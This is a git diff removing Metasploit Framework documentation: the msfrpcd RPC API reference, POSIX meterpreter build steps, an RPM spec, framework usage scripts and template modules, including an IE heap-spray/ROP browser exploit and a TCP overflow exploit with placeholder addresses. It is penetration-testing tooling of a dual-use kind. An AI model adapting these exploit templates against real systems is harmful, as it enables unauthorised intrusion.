- 166
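--- a/documentation/msfrpc.txt
+++ /dev/null
@@ -1,166 +0,0 @@
-[ INTRODUCTION ]
-
-The msfrpcd daemon uses the xmlrpc plugin to provide a remote
-interface to the Metasploit Framework. By default, this service
-listens on port 55553, uses SSL, and is password protected.
-
-The RPC interface allows access to a minimal set of framework
-APIs, covering the core framework, the module set, the job list,
-and the session table. These APIs can be used to enumerate
-modules, execute them, and interact with the resulting sessions
-and jobs. 
-
-
-[ USAGE ]
-
-To activate the RPC interface, launch msfrpcd, or load msfconsole
-and load the xmlrpc plugin. 
-
-$ ./msfrpcd -P s3cr3tp4ss
- - or -
-msf> load xmlrpc Pass=s3cr3tp4ss
-
-Once the interface is started, any compatible RPC interface can be used
-to interact with the service. The 'msfrpc' client provides a Ruby
-shell that can be used to talk to the service.
-
-$ ./msfrpc -h server_name -P s3cr3tp4ss
-[*] The 'rpc' object holds the RPC client interface
-
->> rpc.call("core.version")
-=> {"version"=>"3.3-dev"}
-
-
-[ API - AUTH ]
-
- Method: auth.login
-Expects: username, password
-Returns: { "result" => "success", "token" => "<token>" } 
-Summary: This method is used by rpc.login() to obtain the session key
-(token) which is sent in subsequent requests. This token uniquely
-identifies a particular client and can be used by multiple clients,
-even after the originating TCP session is closed. The RPC client
-object automatically sends this token with all other method calls.
-Inactive tokens are destroyed after five minutes of non-use. 
-
-
-[ API - CORE ]
-
- Method: core.version
-Expects: none
-Returns: { "version" => "<framework-version>" } 
-
-
-[ API - MODULE ]
-
- Method: module.exploits
- Method: module.auxiliary
- Method: module.payloads
- Method. module.encoders
- Method: module.nops
-Expects: none
-Returns: { "modules" => [ "module1", "module2", ... ] } 
-Summary: This method is used to obtain a list of available modules
-of the specified type. The resulting module names can be used in
-other calls within the module service.
-
- Method: module.info
-Expects: module_type, module_name
-Returns: { "name" => "<name>", ... }
-Summary: This method returns all shared module fields (name, authors,
-version, description, etc), but also the list of targets and actions
-when appropriate.
-
- Method: module.options
-Expects: module_type, module_name
-Returns: { "<option_name>" => { "type" => "integer", ... } }
-Summary: This method returns a list of all options for a given module,
-including advanced and evasion options. The returned hash contains
-detailed information about each option, including its type, its
-default value, whether it is required, and so on.
-
- Method: module.compatible_payloads
-Expects: module_name
-Returns: { "payloads" => [ "payload1", "payload2", ... ] }
-Summary: This method only works for exploit modules and returns a
-list of payloads that are compatible with the specified exploit.
-
- Method: module.execute
-Expects: module_type, module_name, options_hash
-Returns: { "result" => "success" }
-Summary: This method only works for exploit and auxiliary modules
-and uses the simplified framework API to launch these modules
-with the specified options. Option values should be placed into
-the options_hash argument, including items such as PAYLOAD,
-TARGET, ACTION, and all required options.
-
-
-
-[ API - JOB ]
-
- Method: job.list
-Expects: none
-Returns: { "<job_id>" => "<job_name>" }
-Summary: This method returns a list of running jobs, along with
-the name of the job.
-
- Method: job.stop
-Expects: job_id
-Returns: { "result" => "success" }
-Summary: This method kills a specific job by ID
-
-
-
-[ API - SESSION ]
-
- Method: session.list
-Expects: none
-Returns: { "<session_id>" => { "type" => "shell", ... } }
-Summary: This method returns a list of active sessions, including
-the fields type, tunnel_local, tunnel_peer, via_exploit,
-via_payload, and desc.  
-
- Method: session.stop
-Expects: session_id
-Returns: { "result" => "success" }
-Summary: This method kills a specific session by ID
-
- Method: session.shell_read
-Expects: session_id
-Returns: { "data" => "<shell_data>" }
-Summary: This method reads any pending output from a session. This
-method only works for sessions of type "shell" and does not block.
-
- Method: session.shell_write
-Expects: session_id, shell_data
-Returns: { "write_count" => "<number_of_bytes_written>" }
-Summary: This method writes the specified input into the session. 
-This method only works for sessions of type "shell" and does not 
-block.
-
-
-[ EXCEPTIONS ]
-
-When an error occurs, an exception is thrown on the client side. This
-exception will be of class XMLRPC::FaultException and the faultCode
-and faultString methods of this exception will contain detailed
-information about the problem. Many API calls will raise faultCode
-of 404 when the specified item is not found. An unhandled, server
-exception will result in a faultCode of 500 on the client side.
-
-
-
-[ SECURITY CONSIDERATIONS ]
-
-At this time, the SSL certificate used by the service is 
-dynamically allocated, making it vulnerable to a man-in-the-middle
-attack. Future versions will address this by allowing a certificate
-to be generated and verified.
-
-The current implementation passes the username and password for the
-RPC service as parameters on the command line. This can lead to
-disclosure of the password to other local users on some Unix systems.
-The msfrpc and msfrpcd applications change the displayed arguments
-as soon as they are launched, but there is still a brief window of
-time where another local user may snoop the msfrpcd password. In the
-future, the password will be specified via TTY or file.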
+ 0
- 77
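--- a/documentation/posix_meterpreter.txt
+++ /dev/null
@@ -1,77 +0,0 @@
-Steps needed to build the POSIX meterpreter from scratch
---------------------------------------------------------
-
-1) Build bionic libc
-
-you will need "jam" package for compiling. 
-
-# cd external/source/meterpreter/source/bionic/libc
-# ARCH=x86 TOP=${PWD} jam
-... lots of output ...
-# cd out/x86/
-# sh make.sh
-.. makes dynamic library ...
-
-you now have a libbionic.so, copy to source/bionic/compiled/libc.so
-
-2) Build bionic libm
-
-# cd external/source/meterpreter/source/bionic/libm
-# make -f msfMakefile
-... lots of output ...
-
-you now have a libm.so, copy to source/bionic/compiled/
-
-3) Build bionic libdl
-
-# cd external/source/meterpreter/source/bionic/libdl
-# make
-
-copy libdl.so to source/bionic/compiled
-
-4) Build openssl 
-
-download openssl 0.9.8o
-
-Edit the Configure file. Locate "linux-elf line, duplicate it, s/-elf/-msf/, s/-ldl//, on the duplicate.
-
-# ./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-msf no-dlfcn shared
-...
-# LIBC=/path/to/bionic/libc
-# LIBM=/path/to/bionic/libm
-# COMPILED=/path/to/bionic/compiled
-# make CC="gcc  -I ${LIBC}/include -I ${LIBC}/kernel/common/linux/ -I ${LIBC}/kernel/common/ -I ${LIBC}/arch-x86/include/ -I ${LIBC}/kernel/arch-x86/  -I${LIBC}/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I${LIBM}/include  -L${COMPILED}  -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend  clean all 
-... lots of compiling ...
-# cp libssl.so ${COMPILED}
-# cp libcrypto.so ${COMPILED}
-
-5) Compile the common/support library code
-
-# cd external/source/meterpreter/workspace/common
-# make
-
-.. copy libsupport.so to source/bionic/compiled ..
-
-6) Build the metsrv_main binary
-
-# cd external/source/meterpreter/workspace/metsrv
-# make
-
-You will need to generate a linker script, and set the location to 0x00040000. -Wl,-verbose >log , edit log for == == 
-
-.. copy metsrv_main to source/bionic/compiled directory
-
-7) Build the rtld binary (last step)
-
-# cd external/source/meterpreter/source/server/rtld
-# make test
-
-(make test will make msflinker, which you can use to test the meterpreter)
-
-8) Compile the ext_server_stdapi 
-
-# external/source/meterpreter/workspace/extensions/stdapi
-# make
-
-copy ext_server_stdapi.so to data/meterpreter/ext_server_stdai.lso <-- notice the .lso
-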
+ 0
- 87
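--- a/documentation/rpm/metasploit.spec
+++ /dev/null
@@ -1,87 +0,0 @@
-%define name metasploit
-%define version 3.2
-%define release 1
-%define prefix /opt
-%define __spec_install_post :
-
-
-BuildArch: noarch
-BuildRoot: %(mktemp -ud %{_tmppath}/%{name}-%{version}-%{release}-XXXXXX)
-Group: Applications/System
-License: BSD
-Name: %{name}
-Packager: Ramon de Carvalho Valle <ramon@risesecurity.org>
-Release: %{release}
-Requires: ruby
-Source: %{name}-%{version}.tar.gz
-Summary: The Metasploit Framework
-URL: http://www.metasploit.com/framework/
-Version: %{version}
-
-
-%description
-The Metasploit Framework is a development platform for creating security tools
-and exploits. The framework is used by network security professionals to
-perform penetration tests, system administrators to verify patch
-installations, product vendors to perform regression testing, and security
-researchers world-wide. The framework is written in the Ruby programming
-language and includes components written in C and assembler.
-
-
-%prep
-%setup -q
-
-
-%install
-rm -rf %{buildroot}
-cd ../
-mkdir -p %{buildroot}%{prefix}
-cp -r %{name}-%{version} %{buildroot}%{prefix}
-
-
-%clean
-rm -rf %{buildroot}
-
-
-%post
-ln -s %{prefix}/%{name}-%{version}/msfcli /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfconsole /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfd /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfelfscan /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfencode /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfgui /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfmachscan /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfopcode /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfpayload /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfpescan /usr/local/bin
-ln -s %{prefix}/%{name}-%{version}/msfweb /usr/local/bin
-
-
-%postun
-rm -f %{prefix}/%{name}-%{version}/msfcli
-rm -f %{prefix}/%{name}-%{version}/msfconsole
-rm -f %{prefix}/%{name}-%{version}/msfd
-rm -f %{prefix}/%{name}-%{version}/msfelfscan
-rm -f %{prefix}/%{name}-%{version}/msfencode
-rm -f %{prefix}/%{name}-%{version}/msfgui
-rm -f %{prefix}/%{name}-%{version}/msfmachscan
-rm -f %{prefix}/%{name}-%{version}/msfopcode
-rm -f %{prefix}/%{name}-%{version}/msfpayload
-rm -f %{prefix}/%{name}-%{version}/msfpescan
-rm -f %{prefix}/%{name}-%{version}/msfweb
-
-
-
-%files
-%defattr(-,root,root)
-%{prefix}/%{name}-%{version}
-
-
-%changelog
-* Sun Nov 19 2008 Ramon de Carvalho Valle <ramon@risesecurity.org> - 3.2-1
-- Changed name to metasploit
-- Added post and postun scripts
-
-* Sun Nov 9 2008 Ramon de Carvalho Valle <ramon@risesecurity.org> - 3.2-1
-- Initial version
-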
+ 0
- 34
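--- a/documentation/samples/framework/dump_module_info.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-#!/usr/bin/env ruby
-#
-# $Id$
-#
-# This sample demonstrates how a module's information can be easily serialized
-# to a readable format.
-#
-# $Revision$
-#
-
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
-
-require 'msf/base'
-
-if (ARGV.empty?)
-  puts "Usage: #{File.basename(__FILE__)} module_name"
-  exit
-end
-
-modname = ARGV.shift
-framework = Msf::Simple::Framework.create
-
-begin
-  # Create the module instance.
-  mod = framework.modules.create(modname)
-  if not mod
-    puts "Error: The specified Msf::Module, \"#{modname}\", was not found."
-  else
-    # Dump the module's information in readable text format.
-    puts Msf::Serializer::ReadableText.dump_module(mod)
-  end
-rescue
-  puts "Error: #{$!}\n\n#{$@.join("\n")}"
-end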
+ 0
- 30
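--- a/documentation/samples/framework/encode_file.rb
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/usr/bin/env ruby
-#
-# $Id$
-#
-# This sample demonstrates how a file can be encoded using a framework
-# encoder.
-#
-# $Revision$
-#
-
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
-
-require 'msf/base'
-
-if (ARGV.empty?)
-  puts "Usage: #{File.basename(__FILE__)} encoder_name file_name format"
-  exit
-end
-
-framework = Msf::Simple::Framework.create
-
-begin
-  # Create the encoder instance.
-  mod = framework.encoders.create(ARGV.shift)
-
-  puts(Msf::Simple::Buffer.transform(
-    mod.encode(IO.read(ARGV.shift)), ARGV.shift || 'ruby'))
-rescue
-  puts "Error: #{$!}\n\n#{$@.join("\n")}"
-end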
+ 0
- 20
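--- a/documentation/samples/framework/enumerate_modules.rb
+++ /dev/null
@@ -1,20 +0,0 @@
-#!/usr/bin/env ruby
-#
-# $Id$
-#
-# This sample demonstrates enumerating all of the modules in the framework and
-# displays their module type and reference name.
-#
-# $Revision$
-#
-
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
-
-require 'msf/base'
-
-framework = Msf::Simple::Framework.create
-
-# Enumerate each module in the framework.
-framework.modules.each_module { |name, mod|
-  puts "#{mod.type}: #{name}"
-}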
+ 0
- 52
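--- a/documentation/samples/framework/run_exploit_using_base.rb
+++ /dev/null
@@ -1,52 +0,0 @@
-#!/usr/bin/env ruby
-#
-# $Id$
-#
-# This sample demonstrates using the framework core directly to launch an
-# exploit.  It makes use of the simplified exploit wrapper method provided by
-# the Msf::Simple::Exploit mixin.
-#
-# $Revision$
-#
-
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
-
-require 'msf/base'
-
-if (ARGV.length == 0)
-  puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
-  exit
-end
-
-framework    = Msf::Simple::Framework.create
-exploit_name = ARGV.shift || 'test/multi/aggressive'
-payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
-input        = Rex::Ui::Text::Input::Stdio.new
-output       = Rex::Ui::Text::Output::Stdio.new
-
-begin
-  # Initialize the exploit instance
-  exploit = framework.exploits.create(exploit_name)
-
-  # Fire it off.
-  session = exploit.exploit_simple(
-    'Payload'     => payload_name,
-    'OptionStr'   => ARGV.join(' '),
-    'LocalInput'  => input,
-    'LocalOutput' => output)
-
-  # If a session came back, try to interact with it.
-  if (session)
-    output.print_status("Session #{session.sid} created, interacting...")
-    output.print_line
-
-    session.init_ui(input, output)
-
-    session.interact
-  else
-    output.print_line("Exploit completed, no session was created.")
-  end
-
-rescue
-  output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
-end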
+ 0
- 68
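--- a/documentation/samples/framework/run_exploit_using_core.rb
+++ /dev/null
@@ -1,68 +0,0 @@
-#!/usr/bin/env ruby
-#
-# $Id$
-#
-# This sample demonstrates using the framework core directly to launch an
-# exploit.  It uses the framework base Framework class so that the
-# distribution module path is automatically set, but relies strictly on
-# framework core classes for everything else.
-#
-# $Revision$
-#
-
-$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..', 'lib'))
-
-require 'msf/base'
-
-if (ARGV.length == 0)
-  puts "Usage: #{File.basename(__FILE__)} exploit_name payload_name OPTIONS"
-  exit
-end
-
-framework    = Msf::Simple::Framework.create
-exploit_name = ARGV.shift || 'test/multi/aggressive'
-payload_name = ARGV.shift || 'windows/meterpreter/reverse_tcp'
-input        = Rex::Ui::Text::Input::Stdio.new
-output       = Rex::Ui::Text::Output::Stdio.new
-
-begin
-  # Create the exploit driver instance.
-  driver = Msf::ExploitDriver.new(framework)
-
-  # Initialize the exploit driver's exploit and payload instance
-  driver.exploit = framework.exploits.create(exploit_name)
-  driver.payload = framework.payloads.create(payload_name)
-
-  # Import options specified in VAR=VAL format from the supplied command
-  # line.
-  driver.exploit.datastore.import_options_from_s(ARGV.join(' '))
-
-  # Share the exploit's datastore with the payload.
-  driver.payload.share_datastore(driver.exploit.datastore)
-
-  # Initialize the target index to what's in the exploit's data store or 
-  # zero by default.
-  driver.target_idx = (driver.exploit.datastore['TARGET'] || 0).to_i
-
-  # Initialize the exploit and payload user interfaces.
-  driver.exploit.init_ui(input, output)
-  driver.payload.init_ui(input, output)
-
-  # Fire it off.
-  session = driver.run
-
-  # If a session came back, try to interact with it.
-  if (session)
-    output.print_status("Session #{session.sid} created, interacting...")
-    output.print_line
-
-    session.init_ui(input, output)
-
-    session.interact
-  else
-    output.print_line("Exploit completed, no session was created.")
-  end
-
-rescue
-  output.print_error("Error: #{$!}\n\n#{$@.join("\n")}")
-end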
+ 0
- 45
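--- a/documentation/samples/modules/auxiliary/sample.rb
+++ /dev/null
@@ -1,45 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-
-###
-#
-# This sample auxiliary module simply displays the selected action and
-# registers a custom command that will show up when the module is used.
-#
-###
-class Metasploit4 < Msf::Auxiliary
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Sample Auxiliary Module',
-      'Description' => 'Sample Auxiliary Module',
-      'Author'      => ['hdm'],
-      'License'     => MSF_LICENSE,
-      'Actions'     =>
-        [
-          ['Default Action'],
-          ['Another Action']
-        ]
-    ))
-
-  end
-
-  def run
-    print_status("Running the simple auxiliary module with action #{action.name}")
-  end
-
-  def auxiliary_commands
-    return { "aux_extra_command" => "Run this auxiliary test commmand" }
-  end
-
-  def cmd_aux_extra_command(*args)
-    print_status("Running inside aux_extra_command()")
-  end
-
-end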
+ 0
- 35
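--- a/documentation/samples/modules/encoders/sample.rb
+++ /dev/null
@@ -1,35 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-###
-#
-# This sample illustrates a very basic encoder that simply returns the block
-# that it's passed.
-#
-###
-class Metasploit4 < Msf::Encoder
-
-  def initialize
-    super(
-      'Name'             => 'Sample Encoder',
-      'Description'      => %q{
-        Sample encoder that just returns the block it's passed
-        when encoding occurs.
-      },
-      'License'          => MSF_LICENSE,
-      'Author'           => 'skape',
-      'Arch'             => ARCH_ALL)
-  end
-
-  #
-  # Returns the unmodified buffer to the caller.
-  #
-  def encode_block(state, buf)
-    buf
-  end
-
-end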
+ 0
- 149
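--- a/documentation/samples/modules/exploits/ie_browser.rb
+++ /dev/null
@@ -1,149 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-#   http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-
-###
-#
-# This exploit sample demonstrates how a typical browser exploit is written using commonly
-# used components such as: HttpServer, BrowserAutopwn, RopDB, DOM Element Property Spray.
-#
-###
-class Metasploit4 < Msf::Exploit::Remote
-  Rank = NormalRanking
-
-  include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::RopDb
-  include Msf::Exploit::Remote::BrowserAutopwn
-
-  # Set :classid and :method for ActiveX exploits. For example:
-  # :classid    => "{C3B92104-B5A7-11D0-A37F-00A0248F0AF1}",
-  # :method     => "SetShapeNodeType",
-  autopwn_info({
-    :ua_name    => HttpClients::IE,
-    :ua_minver  => "8.0",
-    :ua_maxver  => "10.0",
-    :javascript => true,
-    :os_name    => OperatingSystems::Match::WINDOWS,
-    :rank       => NormalRanking
-  })
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "Module Name",
-      'Description'    => %q{
-        This template covers IE8/9/10, and uses the user-agent HTTP header to detect
-        the browser version.  Please note IE8 and newer may emulate an older IE version
-        in compatibility mode, in that case the module won't be able to detect the
-        browser correctly.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     =>
-        [
-          [ 'URL', 'http://metasploit.com' ]
-        ],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
-          [ 'Automatic', {} ],
-          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre } ],
-          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre } ],
-          [ 'IE 8 on Windows 7',      { 'Rop' => :jre } ],
-          [ 'IE 9 on Windows 7',      { 'Rop' => :jre } ],
-          [ 'IE 10 on Windows 8',     { 'Rop' => :jre } ]
-        ],
-      'Payload'        =>
-        {
-          'BadChars'        => "\x00",  # js_property_spray
-          'StackAdjustment' => -3500
-        },
-      'Privileged'     => false,
-      'DisclosureDate' => "Apr 1 2013",
-      'DefaultTarget'  => 0))
-  end
-
-  def get_target(agent)
-    return target if target.name != 'Automatic'
-
-    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
-    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
-
-    ie_name = "IE #{ie}"
-
-    case nt
-    when '5.1'
-      os_name = 'Windows XP SP3'
-    when '6.0'
-      os_name = 'Windows Vista'
-    when '6.1'
-      os_name = 'Windows 7'
-    when '6.2'
-      os_name = 'Windows 8'
-    when '6.3'
-      os_name = 'Windows 8.1'      
-    end
-
-    targets.each do |t|
-      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
-        return t
-      end
-    end
-
-    nil
-  end
-
-  def get_payload(t)
-    stack_pivot = "\x41\x42\x43\x44"
-    code        = payload.encoded
-
-    case t['Rop']
-    when :msvcrt
-      print_status("Using msvcrt ROP")
-      rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
-
-    else
-      print_status("Using JRE ROP")
-      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
-    end
-
-    rop_payload
-  end
-
-
-  def get_html(t)
-    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
-    html = %Q|
-      <script>
-      #{js_property_spray}
-
-      var s = unescape("#{js_p}");
-      sprayHeap({shellcode:s});
-      </script>
-    |
-
-    html.gsub(/^\t\t/, '')
-  end
-
-
-  def on_request_uri(cli, request)
-    agent = request.headers['User-Agent']
-    print_status("Requesting: #{request.uri}")
-
-    target = get_target(agent)
-    if target.nil?
-      print_error("Browser not supported, sending 404: #{agent}")
-      send_not_found(cli)
-      return
-    end
-
-    print_status("Target selected as: #{target.name}")
-    html = get_html(target)
-    send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
-  end
-end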
+ 0
- 85
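--- a/documentation/samples/modules/exploits/sample.rb
+++ /dev/null
@@ -1,85 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-
-###
-#
-# This exploit sample shows how an exploit module could be written to exploit
-# a bug in an arbitrary TCP server.
-#
-###
-class Metasploit4 < Msf::Exploit::Remote
-
-  #
-  # This exploit affects TCP servers, so we use the TCP client mixin.
-  #
-  include Exploit::Remote::Tcp
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Sample Exploit',
-      'Description'    => %q{
-          This exploit module illustrates how a vulnerability could be exploited
-        in an TCP server that has a parsing bug.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => ['skape'],
-      'References'     =>
-        [
-        ],
-      'Payload'        =>
-        {
-          'Space'    => 1000,
-          'BadChars' => "\x00",
-        },
-      'Targets'        =>
-        [
-          # Target 0: Windows All
-          [
-            'Windows XP/Vista/7/8',
-            {
-              'Platform' => 'win',
-              'Ret'      => 0x41424344
-            }
-          ],
-        ],
-      'DisclosureDate' => "Apr 1 2013",
-      'DefaultTarget'  => 0))
-  end
-
-  #
-  # The sample exploit just indicates that the remote host is always
-  # vulnerable.
-  #
-  def check
-    Exploit::CheckCode::Vulnerable
-  end
-
-  #
-  # The exploit method connects to the remote service and sends 1024 random bytes
-  # followed by the fake return address and then the payload.
-  #
-  def exploit
-    connect
-
-    print_status("Sending #{payload.encoded.length} byte payload...")
-
-    # Build the buffer for transmission
-    buf  = rand_text_alpha(1024)
-    buf << [ target.ret ].pack('V')
-    buf << payload.encoded
-
-    # Send it off
-    sock.put(buf)
-    sock.get_once
-
-    handler
-  end
-
-end
-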
+ 0
- 34
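--- a/documentation/samples/modules/nops/sample.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-
-###
-#
-# This class implements a very basic NOP sled generator that just returns a
-# string of 0x90's.
-#
-###
-class Metasploit4 < Msf::Nop
-
-  def initialize
-    super(
-      'Name'        => 'Sample NOP Generator',
-      'Description' => 'Sample single-byte NOP generator',
-      'License'     => MSF_LICENSE,
-      'Author'      => 'skape',
-      'Arch'        => ARCH_X86)
-  end
-
-  #
-  # Returns a string of 0x90's for the supplied length.
-  #
-  def generate_sled(length, opts)
-    "\x90" * length
-  end
-
-end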
+ 0
- 34
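--- a/documentation/samples/modules/payloads/singles/sample.rb
+++ /dev/null
@@ -1,34 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-
-###
-#
-# This sample payload is designed to trigger a debugger exception via int3.
-#
-###
-module Metasploit4
-
-  include Msf::Payload::Single
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'          => 'Debugger Trap',
-      'Description'   => 'Causes a debugger trap exception through int3',
-      'License'       => MSF_LICENSE,
-      'Author'        => 'skape',
-      'Platform'      => 'win',
-      'Arch'          => ARCH_X86,
-      'Payload'       =>
-        {
-          'Payload' => "\xcc"
-        }
-      ))
-  end
-
-end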
+ 0
- 40
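--- a/documentation/samples/modules/post/sample.rb
+++ /dev/null
@@ -1,40 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-require 'msf/core/post/common'
-
-###
-#
-# This post module sample shows how we can execute a command on the compromised machine
-#
-###
-class Metasploit4 < Msf::Post
-
-  include Msf::Post::Common
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'          => 'Sample Post Module',
-      'Description'   => %q{Sample Post Module},
-      'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
-      'Platform'      => [ 'win'],
-      'SessionTypes'  => [ "shell", "meterpreter" ]
-    ))
-  end
-
-  #
-  # This post module runs a ipconfig command and returns the output
-  #
-  def run
-    print_status("Executing ipconfig on remote machine")
-    o = cmd_exec("ipconfig")
-    print_line(o)
-  end
-
-end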
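--- a/documentation/samples/pro/msfrpc_pro_discover.rb
+++ b/documentation/samples/pro/msfrpc_pro_discover.rb
@@ -1,207 +0,0 @@
-#!/usr/bin/env ruby
-require 'rubygems'
-require 'optparse'
-require 'msfrpc-client'
-require 'rex/ui'
-
-def usage(ropts)
-  $stderr.puts ropts
-
-  if @rpc and @rpc.token
-    wspaces = @rpc.call("pro.workspaces") rescue {}
-    if wspaces.keys.length > 0
-      $stderr.puts "Active Projects:"
-      wspaces.each_pair do |k,v|
-        $stderr.puts "\t#{k}"
-      end
-    end
-  end
-  $stderr.puts ""
-  exit(1)
-end
-
-opts = {}
-
-# Parse script-specific options
-parser = Msf::RPC::Client.option_parser(opts)
-parser.separator('Discover Mandatory Options:')
-
-parser.on("--project PROJECT") do |x|
-  opts[:project] = x
-end
-
-parser.on("--targets TARGETS") do |x|
-  opts[:targets] = [x]
-end
-
-parser.on("--blacklist BLACKLIST (optional)") do |x|
-  opts[:blacklist] = x
-end
-
-parser.on("--speed SPEED (optional)") do |x|
-  opts[:speed] = x
-end
-
-parser.on("--extra-ports PORTS (optional)") do |x|
-  opts[:extra_ports] = x
-end
-
-parser.on("--blacklist-ports PORTS (optional)") do |x|
-  opts[:blacklist_ports] = x
-end
-
-parser.on("--custom-ports PORTS (optional)") do |x|
-  opts[:custom_ports] = x
-end
-
-parser.on("--portscan-timeout TIMEOUT (optional)") do |x|
-  opts[:portscan_timeout] = x
-end
-
-parser.on("--source-port PORT (optional)") do |x|
-  opts[:source_port] = x
-end
-
-parser.on("--custom-nmap-options OPTIONS (optional)") do |x|
-  opts[:custom_nmap_options] = x
-end
-
-parser.on("--disable-udp-probes (optional)") do
-  opts[:disable_udp_probes] = true
-end
-
-parser.on("--disable-finger-users (optional)") do
-  opts[:disable_finger_users] = true
-end
-
-parser.on("--disable-snmp-scan (optional)") do 
-  opts[:disable_snmp_scan] = true
-end
-
-parser.on("--disable-service-identification (optional)") do
-  opts[:disable_service_identification] = true
-end
-
-parser.on("--smb-user USER (optional)") do |x|
-  opts[:smb_user] = x
-end
-
-parser.on("--smb-pass PASS (optional)") do |x|
-  opts[:smb_pass] = x
-end
-
-parser.on("--smb-domain DOMAIN (optional)") do |x|
-  opts[:smb_domain] = x
-end
-
-parser.on("--dry-run (optional)") do
-  opts[:dry_run] = true
-end
-
-parser.on("--single-scan (optional)") do
-  opts[:single_scan] = true
-end
-
-parser.on("--fast-detect (optional)") do
-  opts[:fast_detect] = true
-end
-
-parser.on("--help") do
-  $stderr.puts parser
-  exit(1)
-end
-
-parser.separator('')
-parser.parse!(ARGV)
-
-@rpc  = Msf::RPC::Client.new(opts)
-
-if not @rpc.token
-  $stderr.puts "Error: Invalid RPC server options specified"
-  $stderr.puts parser
-  exit(1)
-end
-
-# Provide default values for certain options - If there's no alternative set
-# use the default provided by Pro -- see the documentation.
-project 			= opts[:project]	|| usage(parser)
-targets 			= opts[:targets]	|| usage(parser)
-blacklist			= opts[:blacklist]
-speed				= opts[:speed]		|| "5"
-extra_ports			= opts[:extra_ports]
-blacklist_ports			= opts[:blacklist_ports]
-custom_ports			= opts[:custom_ports]
-portscan_timeout		= opts[:portscan_timeout]	|| 300
-source_port			= opts[:source_port]
-custom_nmap_options		= opts[:custom_nmap_options] || 
-disable_udp_probes		= opts[:disable_udp_probes] || false
-disable_finger_users		= opts[:disable_finger_users] || false
-disable_snmp_scan		= opts[:disable_snmp_scan] || false
-disable_service_identification	= opts[:disable_service_identification] || false
-smb_user			= opts[:smb_user] || ""
-smb_pass			= opts[:smb_pass] || ""
-smb_domain			= opts[:smb_domain] || ""
-single_scan			= opts[:single_scan] || false
-fast_detect			= opts[:fast_detect] || false
-
-# Get the default user from Pro
-user   		= @rpc.call("pro.default_admin_user")['username']
-
-# Create the task object with all options
-task 		= @rpc.call("pro.start_discover", {
-        'workspace'		=> project,
-        'username' 		=> user,
-        'ips'			=> targets,
-        'DS_BLACKLIST_HOSTS'	=> blacklist,
-        'DS_PORTSCAN_SPEED'	=> speed,
-        'DS_PORTS_EXTRA'	=> extra_ports,
-        'DS_PORTS_BLACKLIST'	=> blacklist_ports,
-        'DS_PORTS_CUSTOM'	=> custom_ports,
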